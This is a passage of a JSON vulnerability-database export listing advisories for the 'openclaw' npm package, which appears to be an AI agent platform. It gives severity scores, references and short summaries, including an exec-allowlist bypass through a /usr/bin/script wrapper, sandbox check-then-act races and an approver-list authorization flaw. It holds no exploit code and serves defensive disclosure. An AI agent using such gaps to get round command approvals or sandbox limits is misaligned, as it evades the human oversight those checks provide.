"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/65714" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-49cg-279w-m73x" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43574", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43574" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:19:51Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-via-empty-approver-lists" }, { "reference_url": "https://github.com/advisories/GHSA-49cg-279w-m73x", "reference_id": "GHSA-49cg-279w-m73x", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-49cg-279w-m73x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110264?format=api", "purl": "pkg:npm/openclaw@2026.4.12", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12" } ], "aliases": [ "CVE-2026-43574", "GHSA-49cg-279w-m73x" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2mxq-krq5-bycx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89509?format=api", "vulnerability_id": "VCID-2uqu-k42d-1baq", "summary": "OpenClaw: Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n## Summary\nSandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `32a4a47d602e0618f87b3e59f94d8c142767f860` — 2026-03-30T16:49:49+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw" }, { "reference_url": "https://github.com/advisories/GHSA-rm5c-4rmf-vvhw", "reference_id": "GHSA-rm5c-4rmf-vvhw", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rm5c-4rmf-vvhw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-rm5c-4rmf-vvhw" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2uqu-k42d-1baq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91485?format=api", "vulnerability_id": "VCID-2v8n-mnws-jfc9", "summary": "OpenClaw has a gateway exec allowlist allow-always bypass via unregistered /usr/bin/script wrapper\n## Summary\n\nAllow-always persistence did not unwrap `/usr/bin/script` and similar wrappers to the actual executed target before storing trust decisions.\n\n## Impact\n\nA user approval for one wrapped command could persist trust for a wrapper binary that later executed a different underlying program.\n\n## Affected Component\n\n`src/infra/dispatch-wrapper-resolution.ts, src/infra/exec-wrapper-resolution.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `83da3cfe31` (`infra: unwrap script wrapper approval targets`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41390", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07933", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07919", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07946", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41390" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41390", "reference_id": "CVE-2026-41390", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41390" }, { "reference_url": "https://github.com/advisories/GHSA-6pfc-6m7w-m8fx", "reference_id": "GHSA-6pfc-6m7w-m8fx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6pfc-6m7w-m8fx" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper", "reference_id": "openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41390", "GHSA-6pfc-6m7w-m8fx" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2v8n-mnws-jfc9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89183?format=api", "vulnerability_id": "VCID-2wr9-h42m-a7ev", "summary": "OpenClaw: Tlon media downloads can bypass core safety limits and exhaust disk\n## Summary\nTlon media downloads can bypass core safety limits and exhaust disk\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Tlon media downloads bypassed core size/count/cleanup limits, but this is availability-only resource exhaustion in a bundled plugin path, so low.\n\n## Affected Packages / Versions\n- Package: `openclaw` 